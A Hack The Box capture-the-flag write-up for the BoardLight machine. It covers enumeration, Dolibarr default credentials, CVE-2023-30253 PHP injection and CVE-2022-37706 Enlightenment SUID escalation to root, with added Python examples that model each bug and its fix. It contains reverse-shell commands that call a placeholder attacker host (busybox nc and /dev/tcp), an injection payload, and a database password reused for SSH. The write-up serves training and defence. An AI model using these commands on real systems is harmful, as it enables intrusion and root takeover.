BoardLight — Hack The Box

Info        Value
OS          Linux (Ubuntu)
Difficulty  Easy
IP          10.129.231.37
Hostname    board.htb
Services    SSH (22), HTTP/Apache (80)

Enumeration

See also: Network Discovery & Scanning and Reconnaissance-and-Information-Gathering

Nmap

nmap -sC -sV -p- -vvv -oA scan/nmap.scan 10.129.231.37
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)

Open ports:

  • 22/tcp — OpenSSH 8.2p1 Ubuntu → SSH Notes
  • 80/tcp — Apache httpd 2.4.41

Directory Bruteforce

feroxbuster -u http://10.129.231.37/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x js,html,php,txt,json,docx -o scan/root.dir

Nothing relevant — static pages (index.php, about.php, contact.php, do.php).

In the site footer it reads: © 2020 All Rights Reserved By Board.htb

sudo tee -a /etc/hosts <<< "10.129.231.37  Board.htb"

VHost Enumeration

ffuf -H "Host: FUZZ.Board.htb" -H "User-Agent: PENTEST" -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://Board.htb/ -fs 15949

Found: crm.Board.htb (Status: 200, Size: 6360)

sudo tee -a /etc/hosts <<< "10.129.231.37  crm.Board.htb"

Foothold — Dolibarr RCE

Deep dive: Web-Application-Security and Server-Side-Vulnerabilities

Dolibarr 17.0.0 — Default Credentials

Navigating to http://crm.Board.htb we find a login panel for Dolibarr ERP/CRM 17.0.0.

Trying default credentials: admin:admin — valid login.

CVE-2023-30253 — PHP Code Injection

Vulnerability

Dolibarr before 17.0.1 lets an authenticated user with rights on the Website module achieve remote code execution. The website page editor rejects content containing the PHP open tag <?php, but the check is case-sensitive while PHP's parser is not: the same code written as <?PHP ... ?> passes the filter and is executed when the page is served. With admin:admin we have full rights, so the module can be enabled and a page created if none exist yet.

Ref: https://github.com/Rubikcuv5/cve-2023-30253
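To make the filter failure concrete, here is an added example (not Dolibarr's code and not from the exploit repository) that models the blocklist class behind CVE-2023-30253 in Python. The page bodies are constructed; the hardened check is our own suggestion and goes beyond the case issue by also matching the <?= echo tag and bare <? short tags, which a naive "<?php" check also misses.

```python
"""Added example (not Dolibarr's code): why a case-sensitive PHP-tag filter fails.

Models the filter class behind CVE-2023-30253 with constructed page bodies.
The hardened check is our own suggestion, not Dolibarr's actual patch.
"""
import re

# Constructed website-page bodies, as an editor might submit them.
SAMPLES = {
    "benign":    "<h1>Welcome</h1><p>Board.htb</p>",
    "lowercase": "<h1>x</h1><?php system($_GET['c']); ?>",
    "uppercase": "<h1>x</h1><?PHP system($_GET['c']); ?>",  # the CVE-2023-30253 bypass
    "mixedcase": "<h1>x</h1><?Php system($_GET['c']); ?>",
    "shortecho": "<h1>x</h1><?= `id` ?>",                    # <?= is always enabled in PHP 7+
    "shorttag":  "<h1>x</h1><? system('id'); ?>",            # needs short_open_tag=On
}


def naive_filter(body: str) -> bool:
    """Case-sensitive substring check: rejects (True) only the lowercase '<?php'."""
    return "<?php" in body


# PHP recognises '<?php' case-insensitively, '<?=' unconditionally, and a bare
# '<?' followed by whitespace when short_open_tag is on. '<?xml' is left alone.
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=|(?=\s))", re.IGNORECASE)


def hardened_filter(body: str) -> bool:
    """Rejects (True) any PHP open tag, regardless of case or form."""
    return PHP_OPEN_TAG.search(body) is not None


def evaluate(body: str) -> dict:
    """Run both checks on one page body so the gap is visible side by side."""
    return {"naive_rejects": naive_filter(body),
            "hardened_rejects": hardened_filter(body)}


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(f"{name:10s} {evaluate(body)}")
```

The deeper point for a code review: a tag blocklist is the wrong control. Content that users can edit should never be handed to the PHP interpreter at all, and the case-insensitive regex above only narrows the gap it does not close.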

Setup exploit

git clone https://github.com/Rubikcuv5/cve-2023-30253.git
cd cve-2023-30253
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt

Exploitation

Start a listener on the attacking host:

nc -lvnp 80

Exploit execution:

python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -c "busybox nc <ATTACKER_IP> 80 -e /bin/bash"

busybox nc

On Ubuntu the default nc is the OpenBSD variant, which has no -e option at all (nc.traditional and ncat do, but are rarely installed), so a plain nc -e payload fails. The BusyBox nc applet does support -e, and busybox is present on this target, so busybox nc <ATTACKER_IP> 80 -e /bin/bash gives a working reverse shell. If busybox is missing, a bash TCP redirection (bash -i >& /dev/tcp/<ATTACKER_IP>/80 0>&1) is the usual fallback.

Reverse shell obtained as www-data.

Shell Stabilization

python3 -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl+Z
stty raw -echo; fg
export TERM=xterm

User — larissa

Password Reuse from conf.php

Technique: Code Repository Mining

Reading the Dolibarr configuration:

www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php

Database credentials found:

Field     Value
DB User   dolibarrowner
DB Pass   serverfun2$2023!!
DB Name   dolibarr
DB Host   localhost:3306

User Enumeration

From /etc/passwd, the only user with a home directory and bash shell is larissa (uid 1000).

SSH with Password Reuse

The database password also works for the larissa user:

ssh larissa@Board.htb
# Password: serverfun2$2023!!

User flag in /home/larissa/user.txt.

Privilege Escalation

Methodology: Privilege Escalation Vectors

SUID Enumeration

Search for binaries with the SUID bit set (use -perm /6000 instead of -perm -4000 to catch SGID binaries in the same pass):

find / -perm -4000 -type f 2>/dev/null

Among the results, the helpers of the Enlightenment window manager stand out, since they are not part of a stock Ubuntu install:

SUID Binary              Path
enlightenment_sys        /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
enlightenment_ckpasswd   /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
enlightenment_backlight  /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
freqset                  /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
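Spotting the odd entries in a long find listing is easier against a baseline. The following added example (not from the writeup) walks the filesystem the way the find command does, including SGID, and diffs the result against a constructed set of setuid binaries expected on a stock Ubuntu 20.04 host. The baseline names are assumptions for illustration; on an engagement, generate it from a clean image of the same release.

```python
"""Added example (not from the writeup): enumerate SUID/SGID binaries and triage
them against a baseline so non-stock helpers stand out."""
import os
import stat

# Pseudo-filesystems to skip while walking; nothing useful lives there.
PSEUDO_FS = {"/proc", "/sys", "/dev", "/run"}


def find_setuid(root: str = "/") -> list:
    """Return regular files under root with the setuid or setgid bit (find -perm /6000)."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PSEUDO_FS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(path)
    return sorted(hits)


# Constructed baseline (assumption): setuid binaries typical of stock Ubuntu 20.04.
UBUNTU_BASELINE = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount", "/usr/bin/umount",
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/fusermount", "/usr/bin/pkexec", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1",
}


def triage(inventory, baseline=UBUNTU_BASELINE) -> dict:
    """Split an inventory into binaries the baseline expects and ones it does not."""
    inv = set(inventory)
    return {"unexpected": sorted(inv - baseline), "expected": sorted(inv & baseline)}


# Constructed inventory mirroring what the find command returned on BoardLight.
BOARDLIGHT_SAMPLE = [
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount",
    "/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys",
    "/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd",
    "/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight",
    "/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset",
]

if __name__ == "__main__":
    report = triage(BOARDLIGHT_SAMPLE)
    for path in report["unexpected"]:
        print("[!] not in baseline:", path)
```

On a live host, replace BOARDLIGHT_SAMPLE with find_setuid(); the "unexpected" list is where to spend review time, and dpkg -S on each path tells you which package shipped it.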

CVE-2022-37706 — Enlightenment SUID Exploit

Vulnerability

Enlightenment before 0.25.4 ships enlightenment_sys as a SUID-root helper that mounts and unmounts devices for the desktop user. It applies prefix checks to the raw device and mount-point strings (the device must start with /dev/) and then assembles the mount command line as a single string that is executed through the shell via system(3). A device argument such as /dev/../tmp/;/tmp/exploit passes the prefix check, and the ; ends the mount command, so whatever follows it runs as root. The mount itself fails (note the fstab error in the output below); the root shell comes from the injected command, not from a mounted filesystem. The cpufreq module path above (...-0.23.1) dates this install to Enlightenment 0.23.1, well inside the vulnerable range.

Ref: https://github.com/junnythemarksman/CVE-2022-37706
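The bug class is worth seeing in isolation: a string-prefix check on an unnormalised path, followed by a shell invocation. The added example below (not Enlightenment's code and not the PoC) models it in Python with a harmless echo standing in for mount, so the injection is visible without touching real devices. The payload shape matches the PoC's device argument; the hardened variant canonicalises the path and passes an argv list instead of a shell string.

```python
"""Added example (not Enlightenment's code): the bug class behind CVE-2022-37706.

A setuid helper checks only that the device path starts with '/dev/' and then
runs a shell command string built from it. 'echo' stands in for mount here.
"""
import os
import subprocess

DEV_ROOT = "/dev"
# Constructed payload with the same shape as the PoC's '/dev/../tmp/;/tmp/exploit'.
PAYLOAD = "/dev/../tmp/;echo INJECTED"


def vulnerable_check(dev: str) -> bool:
    """Prefix check on the raw string: '/dev/../tmp/;...' passes."""
    return dev.startswith(DEV_ROOT + "/")


def vulnerable_run(dev: str) -> str:
    """Builds one command string and runs it through /bin/sh, like system(3)."""
    if not vulnerable_check(dev):
        raise PermissionError(dev)
    cmd = f"echo mount {dev} /tmp/net"          # stand-in for the real mount command
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def hardened_check(dev: str) -> bool:
    """Canonicalise first ('..' and symlinks), then confine to DEV_ROOT."""
    resolved = os.path.realpath(dev)
    return os.path.commonpath([resolved, DEV_ROOT]) == DEV_ROOT and resolved != DEV_ROOT


def hardened_run(dev: str) -> str:
    """Pass an argv list: no shell is involved, so ';' is just a byte in one argument."""
    if not hardened_check(dev):
        raise PermissionError(dev)
    argv = ["echo", "mount", dev, "/tmp/net"]
    return subprocess.run(argv, capture_output=True, text=True).stdout


def hardened_rejects(dev: str) -> bool:
    """True when the hardened helper refuses the argument outright."""
    try:
        hardened_run(dev)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    print(vulnerable_run(PAYLOAD), end="")      # second line proves the injection
    print("hardened rejects payload:", hardened_rejects(PAYLOAD))
    print(hardened_run("/dev/sda1"), end="")
```

Note that realpath also defeats a symlink planted under /dev pointing elsewhere, and commonpath avoids the classic "/devices/..." string-prefix slip; the argv list is what removes the injection, the path check only limits what can be mounted.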

Exploitation

nano exploit.sh    # paste the script from the exploit
chmod +x exploit.sh
bash ./exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Welcome to the rabbit hole :)
If it is not found in fstab, big deal :D
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)

Root flag in /root/root.txt.


Attack Chain Summary

Footer leak (Board.htb) → VHost enum (crm.Board.htb) → Dolibarr 17.0.0

  Default creds (admin:admin) → CVE-2023-30253 RCE → www-data

  conf.php → DB password reuse → SSH larissa → user.txt

  SUID enum → Enlightenment binaries → CVE-2022-37706 → root